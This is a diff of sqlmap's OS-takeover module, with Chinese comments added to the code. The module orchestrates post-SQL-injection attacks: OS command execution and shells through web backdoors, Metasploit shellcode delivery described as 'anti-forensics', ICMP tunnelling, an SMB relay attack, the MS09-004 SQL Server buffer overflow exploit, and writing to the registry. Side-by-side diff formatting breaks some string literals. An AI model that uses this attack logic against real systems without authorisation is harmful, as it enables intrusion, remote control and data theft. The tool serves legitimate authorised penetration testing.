@ -5,234 +5,262 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import os import os # 导入os模块提供与操作系统交互的功能
from lib.core.common import Backend from lib.core.common import Backend # 导入Backend类用于获取后端数据库信息
from lib.core.common import getSafeExString from lib.core.common import getSafeExString # 导入getSafeExString函数用于获取安全的异常字符串
from lib.core.common import isDigit from lib.core.common import isDigit # 导入isDigit函数用于判断字符串是否为数字
from lib.core.common import isStackingAvailable from lib.core.common import isStackingAvailable # 导入isStackingAvailable函数用于判断是否支持堆叠查询
from lib.core.common import openFile from lib.core.common import openFile # 导入openFile函数用于安全地打开文件
from lib.core.common import readInput from lib.core.common import readInput # 导入readInput函数用于安全地读取用户输入
from lib.core.common import runningAsAdmin from lib.core.common import runningAsAdmin # 导入runningAsAdmin函数用于判断是否以管理员身份运行
from lib.core.data import conf from lib.core.data import conf # 导入conf对象存储全局配置信息
from lib.core.data import kb from lib.core.data import kb # 导入kb对象存储全局知识库信息
from lib.core.data import logger from lib.core.data import logger # 导入logger对象用于记录日志
from lib.core.enums import DBMS from lib.core.enums import DBMS # 导入DBMS枚举类定义数据库类型
from lib.core.enums import OS from lib.core.enums import OS # 导入OS枚举类定义操作系统类型
from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapFilePathException # 导入SqlmapFilePathException异常类表示文件路径错误
from lib.core.exception import SqlmapMissingDependence from lib.core.exception import SqlmapMissingDependence # 导入SqlmapMissingDependence异常类表示缺少依赖
from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingMandatoryOptionException # 导入SqlmapMissingMandatoryOptionException异常类表示缺少必要选项
from lib.core.exception import SqlmapMissingPrivileges from lib.core.exception import SqlmapMissingPrivileges # 导入SqlmapMissingPrivileges异常类表示缺少权限
from lib.core.exception import SqlmapNotVulnerableException from lib.core.exception import SqlmapNotVulnerableException # 导入SqlmapNotVulnerableException异常类表示目标不漏洞
from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapSystemException # 导入SqlmapSystemException异常类表示系统错误
from lib.core.exception import SqlmapUndefinedMethod from lib.core.exception import SqlmapUndefinedMethod # 导入SqlmapUndefinedMethod异常类表示未定义的方法
from lib.core.exception import SqlmapUnsupportedDBMSException from lib.core.exception import SqlmapUnsupportedDBMSException # 导入SqlmapUnsupportedDBMSException异常类表示不支持的数据库类型
from lib.takeover.abstraction import Abstraction from lib.takeover.abstraction import Abstraction # 导入Abstraction类用于定义抽象的接管功能
from lib.takeover.icmpsh import ICMPsh from lib.takeover.icmpsh import ICMPsh # 导入ICMPsh类用于定义ICMP隧道功能
from lib.takeover.metasploit import Metasploit from lib.takeover.metasploit import Metasploit # 导入Metasploit类用于定义Metasploit接管功能
from lib.takeover.registry import Registry from lib.takeover.registry import Registry # 导入Registry类用于定义注册表操作功能
class Takeover(Abstraction, Metasploit, ICMPsh, Registry): class Takeover(Abstraction, Metasploit, ICMPsh, Registry):
""" """
This class defines generic OS takeover functionalities for plugins. This class defines generic OS takeover functionalities for plugins.
这个类定义了插件的通用操作系统接管功能
""" """
def __init__(self): def __init__(self):
self.cmdTblName = ("%soutput" % conf.tablePrefix) # 初始化命令输出表名称和字段名称
self.tblField = "data" self.cmdTblName = ("%soutput" % conf.tablePrefix) # 命令输出表名,使用配置中的表前缀
self.tblField = "data" # 表字段名,存储命令输出数据
Abstraction.__init__(self) Abstraction.__init__(self) # 初始化Abstraction基类
def osCmd(self): def osCmd(self):
"""
Executes a single operating system command.
执行单个操作系统命令
"""
# 判断是否可以通过堆叠查询或直接连接执行系统命令
if isStackingAvailable() or conf.direct: if isStackingAvailable() or conf.direct:
web = False web = False # 如果支持堆叠查询或直接连接则不使用Web后门
elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL): elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL):
infoMsg = "going to use a web backdoor for command execution" infoMsg = "going to use a web backdoor for command execution"
logger.info(infoMsg) logger.info(infoMsg)
web = True web = True # 如果不支持堆叠查询且是MySQL数据库则使用Web后门
else: else:
errMsg = "unable to execute operating system commands via " errMsg = "unable to execute operating system commands via "
errMsg += "the back-end DBMS" errMsg += "the back-end DBMS"
raise SqlmapNotVulnerableException(errMsg) raise SqlmapNotVulnerableException(errMsg) # 否则抛出异常,表示无法通过后端数据库执行系统命令
self.getRemoteTempPath() self.getRemoteTempPath() # 获取远程临时路径
self.initEnv(web=web) self.initEnv(web=web) # 初始化环境
# 如果不使用Web后门或者使用Web后门但URL存在则执行命令
if not web or (web and self.webBackdoorUrl is not None): if not web or (web and self.webBackdoorUrl is not None):
self.runCmd(conf.osCmd) self.runCmd(conf.osCmd) # 执行配置中的系统命令
# 如果不开启操作系统shell或pwn并且没有清理需求则进行清理
if not conf.osShell and not conf.osPwn and not conf.cleanup: if not conf.osShell and not conf.osPwn and not conf.cleanup:
self.cleanup(web=web) self.cleanup(web=web) # 清理环境
def osShell(self): def osShell(self):
"""
Prompts for an interactive operating system shell.
提示进行交互式操作系统shell
"""
# 判断是否可以通过堆叠查询或直接连接执行shell
if isStackingAvailable() or conf.direct: if isStackingAvailable() or conf.direct:
web = False web = False # 如果支持堆叠查询或直接连接则不使用Web后门
elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL): elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL):
infoMsg = "going to use a web backdoor for command prompt" infoMsg = "going to use a web backdoor for command prompt"
logger.info(infoMsg) logger.info(infoMsg)
web = True web = True # 如果不支持堆叠查询且是MySQL数据库则使用Web后门
else: else:
errMsg = "unable to prompt for an interactive operating " errMsg = "unable to prompt for an interactive operating "
errMsg += "system shell via the back-end DBMS because " errMsg += "system shell via the back-end DBMS because "
errMsg += "stacked queries SQL injection is not supported" errMsg += "stacked queries SQL injection is not supported"
raise SqlmapNotVulnerableException(errMsg) raise SqlmapNotVulnerableException(errMsg) # 否则抛出异常表示无法通过后端数据库获取交互式shell
self.getRemoteTempPath() self.getRemoteTempPath() # 获取远程临时路径
try: try:
self.initEnv(web=web) self.initEnv(web=web) # 初始化环境
except SqlmapFilePathException: except SqlmapFilePathException: # 如果初始化环境出现文件路径异常
if not web and not conf.direct: if not web and not conf.direct:
infoMsg = "falling back to web backdoor method..." infoMsg = "falling back to web backdoor method..."
logger.info(infoMsg) logger.info(infoMsg)
web = True web = True # 回退到使用Web后门
kb.udfFail = True kb.udfFail = True # 设置UDF失败标记
self.initEnv(web=web) self.initEnv(web=web) # 重新初始化环境使用Web后门
else: else:
raise raise # 如果不能回退到Web后门则抛出异常
# 如果不使用Web后门或者使用Web后门但URL存在则进入shell
if not web or (web and self.webBackdoorUrl is not None): if not web or (web and self.webBackdoorUrl is not None):
self.shell() self.shell() # 进入shell
# 如果不开启操作系统pwn并且没有清理需求则进行清理
if not conf.osPwn and not conf.cleanup: if not conf.osPwn and not conf.cleanup:
self.cleanup(web=web) self.cleanup(web=web) # 清理环境
def osPwn(self): def osPwn(self):
goUdf = False """
fallbackToWeb = False Attempts to gain an out-of-band session via Metasploit or ICMP.
setupSuccess = False 尝试通过Metasploit或ICMP获取带外会话
"""
goUdf = False # 是否使用UDF执行
fallbackToWeb = False # 是否回退到Web后门
setupSuccess = False # 是否设置成功
self.checkDbmsOs() self.checkDbmsOs() # 检查数据库服务器操作系统
if Backend.isOs(OS.WINDOWS): if Backend.isOs(OS.WINDOWS): # 如果操作系统是Windows
msg = "how do you want to establish the tunnel?" msg = "how do you want to establish the tunnel?"
msg += "\n[1] TCP: Metasploit Framework (default)" msg += "\
msg += "\n[2] ICMP: icmpsh - ICMP tunneling" [1] TCP: Metasploit Framework (default)"
msg += "\
[2] ICMP: icmpsh - ICMP tunneling"
while True: while True:
tunnel = readInput(msg, default='1') tunnel = readInput(msg, default='1') # 读取用户选择的隧道类型
if isDigit(tunnel) and int(tunnel) in (1, 2): if isDigit(tunnel) and int(tunnel) in (1, 2):
tunnel = int(tunnel) tunnel = int(tunnel) # 将用户输入转换为整数
break break
else: else:
warnMsg = "invalid value, valid values are '1' and '2'" warnMsg = "invalid value, valid values are '1' and '2'"
logger.warning(warnMsg) logger.warning(warnMsg) # 如果输入无效,则给出警告
else: else:
tunnel = 1 tunnel = 1 # 如果不是Windows系统则默认使用TCP隧道
debugMsg = "the tunnel can be established only via TCP when " debugMsg = "the tunnel can be established only via TCP when "
debugMsg += "the back-end DBMS is not Windows" debugMsg += "the back-end DBMS is not Windows"
logger.debug(debugMsg) logger.debug(debugMsg)
if tunnel == 2: if tunnel == 2: # 如果选择ICMP隧道
isAdmin = runningAsAdmin() isAdmin = runningAsAdmin() # 判断是否以管理员身份运行
if not isAdmin: if not isAdmin:
errMsg = "you need to run sqlmap as an administrator " errMsg = "you need to run sqlmap as an administrator "
errMsg += "if you want to establish an out-of-band ICMP " errMsg += "if you want to establish an out-of-band ICMP "
errMsg += "tunnel because icmpsh uses raw sockets to " errMsg += "tunnel because icmpsh uses raw sockets to "
errMsg += "sniff and craft ICMP packets" errMsg += "sniff and craft ICMP packets"
raise SqlmapMissingPrivileges(errMsg) raise SqlmapMissingPrivileges(errMsg) # 如果不是以管理员身份运行,则抛出异常,表示缺少权限
try: try:
__import__("impacket") __import__("impacket") # 尝试导入impacket库
except ImportError: except ImportError:
errMsg = "sqlmap requires 'python-impacket' third-party library " errMsg = "sqlmap requires 'python-impacket' third-party library "
errMsg += "in order to run icmpsh master. You can get it at " errMsg += "in order to run icmpsh master. You can get it at "
errMsg += "https://github.com/SecureAuthCorp/impacket" errMsg += "https://github.com/SecureAuthCorp/impacket"
raise SqlmapMissingDependence(errMsg) raise SqlmapMissingDependence(errMsg) # 如果缺少impacket库则抛出异常表示缺少依赖
filename = "/proc/sys/net/ipv4/icmp_echo_ignore_all" filename = "/proc/sys/net/ipv4/icmp_echo_ignore_all" # ICMP回显忽略文件路径
if os.path.exists(filename): if os.path.exists(filename):
try: try:
with openFile(filename, "wb") as f: with openFile(filename, "wb") as f:
f.write("1") f.write("1") # 禁用ICMP回显
except IOError as ex: except IOError as ex:
errMsg = "there has been a file opening/writing error " errMsg = "there has been a file opening/writing error "
errMsg += "for filename '%s' ('%s')" % (filename, getSafeExString(ex)) errMsg += "for filename '%s' ('%s')" % (filename, getSafeExString(ex))
raise SqlmapSystemException(errMsg) raise SqlmapSystemException(errMsg) # 如果文件打开/写入错误,则抛出异常
else: else:
errMsg = "you need to disable ICMP replies by your machine " errMsg = "you need to disable ICMP replies by your machine "
errMsg += "system-wide. For example run on Linux/Unix:\n" errMsg += "system-wide. For example run on Linux/Unix:\
errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\n" "
errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\
"
errMsg += "If you miss doing that, you will receive " errMsg += "If you miss doing that, you will receive "
errMsg += "information from the database server and it " errMsg += "information from the database server and it "
errMsg += "is unlikely to receive commands sent from you" errMsg += "is unlikely to receive commands sent from you"
logger.error(errMsg) logger.error(errMsg) # 如果文件不存在,给出错误提示
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
self.sysUdfs.pop("sys_bineval") self.sysUdfs.pop("sys_bineval") # 如果是MySQL或PostgreSQL移除sys_bineval UDF
self.getRemoteTempPath() self.getRemoteTempPath() # 获取远程临时路径
# 判断是否可以通过堆叠查询或直接连接执行
if isStackingAvailable() or conf.direct: if isStackingAvailable() or conf.direct:
web = False web = False # 如果支持堆叠查询或直接连接则不使用Web后门
self.initEnv(web=web) self.initEnv(web=web) # 初始化环境
if tunnel == 1: if tunnel == 1: # 如果选择TCP隧道
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): # 如果是MySQL或PostgreSQL
msg = "how do you want to execute the Metasploit shellcode " msg = "how do you want to execute the Metasploit shellcode "
msg += "on the back-end database underlying operating system?" msg += "on the back-end database underlying operating system?"
msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)" msg += "\
msg += "\n[2] Via 'shellcodeexec' (file system way, preferred on 64-bit systems)" [1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
msg += "\
[2] Via 'shellcodeexec' (file system way, preferred on 64-bit systems)"
while True: while True:
choice = readInput(msg, default='1') choice = readInput(msg, default='1') # 读取用户选择的执行方式
if isDigit(choice) and int(choice) in (1, 2): if isDigit(choice) and int(choice) in (1, 2):
choice = int(choice) choice = int(choice) # 将用户输入转换为整数
break break
else: else:
warnMsg = "invalid value, valid values are '1' and '2'" warnMsg = "invalid value, valid values are '1' and '2'"
logger.warning(warnMsg) logger.warning(warnMsg) # 如果输入无效,则给出警告
if choice == 1: if choice == 1:
goUdf = True goUdf = True # 如果选择使用UDF则设置标记
if goUdf: if goUdf:
exitfunc = "thread" exitfunc = "thread" # 如果使用UDF则设置退出函数为线程
setupSuccess = True setupSuccess = True # 设置成功
else: else:
exitfunc = "process" exitfunc = "process" # 如果不使用UDF则设置退出函数为进程
self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") # 创建Metasploit shellcode
if not goUdf: if not goUdf:
setupSuccess = self.uploadShellcodeexec(web=web) setupSuccess = self.uploadShellcodeexec(web=web) # 上传shellcodeexec程序
if setupSuccess is not True: if setupSuccess is not True:
if Backend.isDbms(DBMS.MYSQL): if Backend.isDbms(DBMS.MYSQL):
fallbackToWeb = True fallbackToWeb = True # 如果上传失败且是MySQL数据库则回退到Web后门
else: else:
msg = "unable to mount the operating system takeover" msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg) raise SqlmapFilePathException(msg) # 否则抛出异常,表示无法执行操作系统接管
if Backend.isOs(OS.WINDOWS) and Backend.isDbms(DBMS.MYSQL) and conf.privEsc: if Backend.isOs(OS.WINDOWS) and Backend.isDbms(DBMS.MYSQL) and conf.privEsc:
debugMsg = "by default MySQL on Windows runs as SYSTEM " debugMsg = "by default MySQL on Windows runs as SYSTEM "
debugMsg += "user, no need to privilege escalate" debugMsg += "user, no need to privilege escalate"
logger.debug(debugMsg) logger.debug(debugMsg) # 如果是Windows上的MySQL且开启了提权给出调试信息
elif tunnel == 2: elif tunnel == 2: # 如果选择ICMP隧道
setupSuccess = self.uploadIcmpshSlave(web=web) setupSuccess = self.uploadIcmpshSlave(web=web) # 上传icmpsh slave程序
if setupSuccess is not True: if setupSuccess is not True:
if Backend.isDbms(DBMS.MYSQL): if Backend.isDbms(DBMS.MYSQL):
fallbackToWeb = True fallbackToWeb = True # 如果上传失败且是MySQL数据库则回退到Web后门
else: else:
msg = "unable to mount the operating system takeover" msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg) raise SqlmapFilePathException(msg) # 否则抛出异常,表示无法执行操作系统接管
# 如果设置不成功且是MySQL数据库且不是直接连接且不支持堆叠查询或回退到Web后门则使用Web后门
if not setupSuccess and Backend.isDbms(DBMS.MYSQL) and not conf.direct and (not isStackingAvailable() or fallbackToWeb): if not setupSuccess and Backend.isDbms(DBMS.MYSQL) and not conf.direct and (not isStackingAvailable() or fallbackToWeb):
web = True web = True # 设置使用Web后门
if fallbackToWeb: if fallbackToWeb:
infoMsg = "falling back to web backdoor to establish the tunnel" infoMsg = "falling back to web backdoor to establish the tunnel"
@ -240,242 +268,270 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry):
infoMsg = "going to use a web backdoor to establish the tunnel" infoMsg = "going to use a web backdoor to establish the tunnel"
logger.info(infoMsg) logger.info(infoMsg)
self.initEnv(web=web, forceInit=fallbackToWeb) self.initEnv(web=web, forceInit=fallbackToWeb) # 初始化环境,强制初始化
if self.webBackdoorUrl: if self.webBackdoorUrl:
if not Backend.isOs(OS.WINDOWS) and conf.privEsc: if not Backend.isOs(OS.WINDOWS) and conf.privEsc:
# Unset --priv-esc if the back-end DBMS underlying operating # Unset --priv-esc if the back-end DBMS underlying operating
# system is not Windows # system is not Windows
conf.privEsc = False conf.privEsc = False # 如果不是Windows系统且开启了提权则关闭提权
warnMsg = "sqlmap does not implement any operating system " warnMsg = "sqlmap does not implement any operating system "
warnMsg += "user privilege escalation technique when the " warnMsg += "user privilege escalation technique when the "
warnMsg += "back-end DBMS underlying system is not Windows" warnMsg += "back-end DBMS underlying system is not Windows"
logger.warning(warnMsg) logger.warning(warnMsg) # 给出警告
if tunnel == 1: if tunnel == 1:
self.createMsfShellcode(exitfunc="process", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") self.createMsfShellcode(exitfunc="process", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") # 创建Metasploit shellcode
setupSuccess = self.uploadShellcodeexec(web=web) setupSuccess = self.uploadShellcodeexec(web=web) # 上传shellcodeexec程序
if setupSuccess is not True: if setupSuccess is not True:
msg = "unable to mount the operating system takeover" msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg) raise SqlmapFilePathException(msg) # 如果上传失败,则抛出异常
elif tunnel == 2: elif tunnel == 2:
setupSuccess = self.uploadIcmpshSlave(web=web) setupSuccess = self.uploadIcmpshSlave(web=web) # 上传icmpsh slave程序
if setupSuccess is not True: if setupSuccess is not True:
msg = "unable to mount the operating system takeover" msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg) raise SqlmapFilePathException(msg) # 如果上传失败,则抛出异常
if setupSuccess: if setupSuccess:
if tunnel == 1: if tunnel == 1:
self.pwn(goUdf) self.pwn(goUdf) # 如果是TCP隧道则执行pwn
elif tunnel == 2: elif tunnel == 2:
self.icmpPwn() self.icmpPwn() # 如果是ICMP隧道则执行icmpPwn
else: else:
errMsg = "unable to prompt for an out-of-band session" errMsg = "unable to prompt for an out-of-band session"
raise SqlmapNotVulnerableException(errMsg) raise SqlmapNotVulnerableException(errMsg) # 如果设置失败,则抛出异常
if not conf.cleanup: if not conf.cleanup:
self.cleanup(web=web) self.cleanup(web=web) # 如果没有清理需求,则进行清理
def osSmb(self): def osSmb(self):
self.checkDbmsOs() """
Performs a SMB relay attack.
执行SMB中继攻击
"""
self.checkDbmsOs() # 检查数据库服务器操作系统
if not Backend.isOs(OS.WINDOWS): if not Backend.isOs(OS.WINDOWS):
errMsg = "the back-end DBMS underlying operating system is " errMsg = "the back-end DBMS underlying operating system is "
errMsg += "not Windows: it is not possible to perform the SMB " errMsg += "not Windows: it is not possible to perform the SMB "
errMsg += "relay attack" errMsg += "relay attack"
raise SqlmapUnsupportedDBMSException(errMsg) raise SqlmapUnsupportedDBMSException(errMsg) # 如果不是Windows系统则抛出异常表示不支持SMB中继攻击
if not isStackingAvailable() and not conf.direct: if not isStackingAvailable() and not conf.direct:
if Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.MSSQL): if Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.MSSQL):
errMsg = "on this back-end DBMS it is only possible to " errMsg = "on this back-end DBMS it is only possible to "
errMsg += "perform the SMB relay attack if stacked " errMsg += "perform the SMB relay attack if stacked "
errMsg += "queries are supported" errMsg += "queries are supported"
raise SqlmapUnsupportedDBMSException(errMsg) raise SqlmapUnsupportedDBMSException(errMsg) # 如果是PostgreSQL或MSSQL且不支持堆叠查询则抛出异常
elif Backend.isDbms(DBMS.MYSQL): elif Backend.isDbms(DBMS.MYSQL):
debugMsg = "since stacked queries are not supported, " debugMsg = "since stacked queries are not supported, "
debugMsg += "sqlmap is going to perform the SMB relay " debugMsg += "sqlmap is going to perform the SMB relay "
debugMsg += "attack via inference blind SQL injection" debugMsg += "attack via inference blind SQL injection"
logger.debug(debugMsg) logger.debug(debugMsg) # 如果是MySQL且不支持堆叠查询则使用盲注进行SMB中继攻击
printWarn = True printWarn = True # 是否打印警告
warnMsg = "it is unlikely that this attack will be successful " warnMsg = "it is unlikely that this attack will be successful "
if Backend.isDbms(DBMS.MYSQL): if Backend.isDbms(DBMS.MYSQL):
warnMsg += "because by default MySQL on Windows runs as " warnMsg += "because by default MySQL on Windows runs as "
warnMsg += "Local System which is not a real user, it does " warnMsg += "Local System which is not a real user, it does "
warnMsg += "not send the NTLM session hash when connecting to " warnMsg += "not send the NTLM session hash when connecting to "
warnMsg += "a SMB service" warnMsg += "a SMB service" # 如果是MySQL给出警告
elif Backend.isDbms(DBMS.PGSQL): elif Backend.isDbms(DBMS.PGSQL):
warnMsg += "because by default PostgreSQL on Windows runs " warnMsg += "because by default PostgreSQL on Windows runs "
warnMsg += "as postgres user which is a real user of the " warnMsg += "as postgres user which is a real user of the "
warnMsg += "system, but not within the Administrators group" warnMsg += "system, but not within the Administrators group" # 如果是PostgreSQL给出警告
elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
warnMsg += "because often Microsoft SQL Server %s " % Backend.getVersion() warnMsg += "because often Microsoft SQL Server %s " % Backend.getVersion()
warnMsg += "runs as Network Service which is not a real user, " warnMsg += "runs as Network Service which is not a real user, "
warnMsg += "it does not send the NTLM session hash when " warnMsg += "it does not send the NTLM session hash when "
warnMsg += "connecting to a SMB service" warnMsg += "connecting to a SMB service" # 如果是MSSQL给出警告
else: else:
printWarn = False printWarn = False # 如果不是上述情况,则不打印警告
if printWarn: if printWarn:
logger.warning(warnMsg) logger.warning(warnMsg) # 打印警告信息
self.smb() self.smb() # 执行SMB中继攻击
def osBof(self): def osBof(self):
"""
Exploits a buffer overflow vulnerability in the 'sp_replwritetovarbin' stored procedure (MS09-004)
利用 'sp_replwritetovarbin' 存储过程中的缓冲区溢出漏洞 (MS09-004)
"""
if not isStackingAvailable() and not conf.direct: if not isStackingAvailable() and not conf.direct:
return return # 如果不支持堆叠查询或不是直接连接,则返回
if not Backend.isDbms(DBMS.MSSQL) or not Backend.isVersionWithin(("2000", "2005")): if not Backend.isDbms(DBMS.MSSQL) or not Backend.isVersionWithin(("2000", "2005")):
errMsg = "the back-end DBMS must be Microsoft SQL Server " errMsg = "the back-end DBMS must be Microsoft SQL Server "
errMsg += "2000 or 2005 to be able to exploit the heap-based " errMsg += "2000 or 2005 to be able to exploit the heap-based "
errMsg += "buffer overflow in the 'sp_replwritetovarbin' " errMsg += "buffer overflow in the 'sp_replwritetovarbin' "
errMsg += "stored procedure (MS09-004)" errMsg += "stored procedure (MS09-004)"
raise SqlmapUnsupportedDBMSException(errMsg) raise SqlmapUnsupportedDBMSException(errMsg) # 如果不是MSSQL 2000或2005则抛出异常表示不支持此漏洞
infoMsg = "going to exploit the Microsoft SQL Server %s " % Backend.getVersion() infoMsg = "going to exploit the Microsoft SQL Server %s " % Backend.getVersion()
infoMsg += "'sp_replwritetovarbin' stored procedure heap-based " infoMsg += "'sp_replwritetovarbin' stored procedure heap-based "
infoMsg += "buffer overflow (MS09-004)" infoMsg += "buffer overflow (MS09-004)"
logger.info(infoMsg) logger.info(infoMsg) # 打印漏洞利用信息
msg = "this technique is likely to DoS the DBMS process, are you " msg = "this technique is likely to DoS the DBMS process, are you "
msg += "sure that you want to carry with the exploit? [y/N] " msg += "sure that you want to carry with the exploit? [y/N] " # 提示是否继续
if readInput(msg, default='N', boolean=True): if readInput(msg, default='N', boolean=True):
self.initEnv(mandatory=False, detailed=True) self.initEnv(mandatory=False, detailed=True) # 初始化环境,不强制,但详细
self.getRemoteTempPath() self.getRemoteTempPath() # 获取远程临时路径
self.createMsfShellcode(exitfunc="seh", format="raw", extra="-b 27", encode=True) self.createMsfShellcode(exitfunc="seh", format="raw", extra="-b 27", encode=True) # 创建Metasploit shellcode使用SEH退出函数
self.bof() self.bof() # 执行缓冲区溢出攻击
def uncPathRequest(self): def uncPathRequest(self):
"""
Initiates a UNC path request.
发起UNC路径请求
"""
errMsg = "'uncPathRequest' method must be defined " errMsg = "'uncPathRequest' method must be defined "
errMsg += "into the specific DBMS plugin" errMsg += "into the specific DBMS plugin"
raise SqlmapUndefinedMethod(errMsg) raise SqlmapUndefinedMethod(errMsg) # 抛出异常表示未在具体DBMS插件中定义此方法
def _regInit(self): def _regInit(self):
"""
Initializes registry operation.
初始化注册表操作
"""
if not isStackingAvailable() and not conf.direct: if not isStackingAvailable() and not conf.direct:
return return # 如果不支持堆叠查询或不是直接连接,则返回
self.checkDbmsOs() self.checkDbmsOs() # 检查数据库服务器操作系统
if not Backend.isOs(OS.WINDOWS): if not Backend.isOs(OS.WINDOWS):
errMsg = "the back-end DBMS underlying operating system is " errMsg = "the back-end DBMS underlying operating system is "
errMsg += "not Windows" errMsg += "not Windows"
raise SqlmapUnsupportedDBMSException(errMsg) raise SqlmapUnsupportedDBMSException(errMsg) # 如果不是Windows系统则抛出异常
self.initEnv() self.initEnv() # 初始化环境
self.getRemoteTempPath() self.getRemoteTempPath() # 获取远程临时路径
def regRead(self): def regRead(self):
self._regInit() """
Reads a value from the Windows registry.
读取Windows注册表中的值
"""
self._regInit() # 初始化注册表操作
if not conf.regKey: if not conf.regKey:
default = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" default = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"
msg = "which registry key do you want to read? [%s] " % default msg = "which registry key do you want to read? [%s] " % default
regKey = readInput(msg, default=default) regKey = readInput(msg, default=default) # 读取用户输入的注册表键,默认使用指定路径
else: else:
regKey = conf.regKey regKey = conf.regKey # 如果配置中指定了注册表键,则使用配置
if not conf.regVal: if not conf.regVal:
default = "ProductName" default = "ProductName"
msg = "which registry key value do you want to read? [%s] " % default msg = "which registry key value do you want to read? [%s] " % default
regVal = readInput(msg, default=default) regVal = readInput(msg, default=default) # 读取用户输入的注册表值默认使用ProductName
else: else:
regVal = conf.regVal regVal = conf.regVal # 如果配置中指定了注册表值,则使用配置
infoMsg = "reading Windows registry path '%s\\%s' " % (regKey, regVal) infoMsg = "reading Windows registry path '%s\\%s' " % (regKey, regVal)
logger.info(infoMsg) logger.info(infoMsg) # 打印读取注册表路径信息
return self.readRegKey(regKey, regVal, True) return self.readRegKey(regKey, regVal, True) # 读取注册表键值,并返回结果
def regAdd(self): def regAdd(self):
self._regInit() """
Adds a value to the Windows registry.
向Windows注册表添加值
"""
self._regInit() # 初始化注册表操作
errMsg = "missing mandatory option" errMsg = "missing mandatory option" # 缺少必要参数的错误信息
if not conf.regKey: if not conf.regKey:
msg = "which registry key do you want to write? " msg = "which registry key do you want to write? "
regKey = readInput(msg) regKey = readInput(msg) # 读取用户输入的注册表键
if not regKey: if not regKey:
raise SqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg) # 如果没有输入,则抛出缺少必要选项异常
else: else:
regKey = conf.regKey regKey = conf.regKey # 如果配置中指定了注册表键,则使用配置
if not conf.regVal: if not conf.regVal:
msg = "which registry key value do you want to write? " msg = "which registry key value do you want to write? "
regVal = readInput(msg) regVal = readInput(msg) # 读取用户输入的注册表值
if not regVal: if not regVal:
raise SqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg) # 如果没有输入,则抛出缺少必要选项异常
else: else:
regVal = conf.regVal regVal = conf.regVal # 如果配置中指定了注册表值,则使用配置
if not conf.regData: if not conf.regData:
msg = "which registry key value data do you want to write? " msg = "which registry key value data do you want to write? "
regData = readInput(msg) regData = readInput(msg) # 读取用户输入的注册表数据
if not regData: if not regData:
raise SqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg) # 如果没有输入,则抛出缺少必要选项异常
else: else:
regData = conf.regData regData = conf.regData # 如果配置中指定了注册表数据,则使用配置
if not conf.regType: if not conf.regType:
default = "REG_SZ" default = "REG_SZ"
msg = "which registry key value data-type is it? " msg = "which registry key value data-type is it? "
msg += "[%s] " % default msg += "[%s] " % default
regType = readInput(msg, default=default) regType = readInput(msg, default=default) # 读取用户输入的注册表类型默认使用REG_SZ
else: else:
regType = conf.regType regType = conf.regType # 如果配置中指定了注册表类型,则使用配置
infoMsg = "adding Windows registry path '%s\\%s' " % (regKey, regVal) infoMsg = "adding Windows registry path '%s\\%s' " % (regKey, regVal)
infoMsg += "with data '%s'. " % regData infoMsg += "with data '%s'. " % regData
infoMsg += "This will work only if the user running the database " infoMsg += "This will work only if the user running the database "
infoMsg += "process has privileges to modify the Windows registry." infoMsg += "process has privileges to modify the Windows registry."
logger.info(infoMsg) logger.info(infoMsg) # 打印添加注册表信息
self.addRegKey(regKey, regVal, regType, regData) self.addRegKey(regKey, regVal, regType, regData) # 添加注册表键值
def regDel(self): def regDel(self):
self._regInit() """
Deletes a value from the Windows registry.
删除Windows注册表中的值
"""
self._regInit() # 初始化注册表操作
errMsg = "missing mandatory option" errMsg = "missing mandatory option" # 缺少必要参数的错误信息
if not conf.regKey: if not conf.regKey:
msg = "which registry key do you want to delete? " msg = "which registry key do you want to delete? "
regKey = readInput(msg) regKey = readInput(msg) # 读取用户输入的注册表键
if not regKey: if not regKey:
raise SqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg) # 如果没有输入,则抛出缺少必要选项异常
else: else:
regKey = conf.regKey regKey = conf.regKey # 如果配置中指定了注册表键,则使用配置
if not conf.regVal: if not conf.regVal:
msg = "which registry key value do you want to delete? " msg = "which registry key value do you want to delete? "
regVal = readInput(msg) regVal = readInput(msg) # 读取用户输入的注册表值
if not regVal: if not regVal:
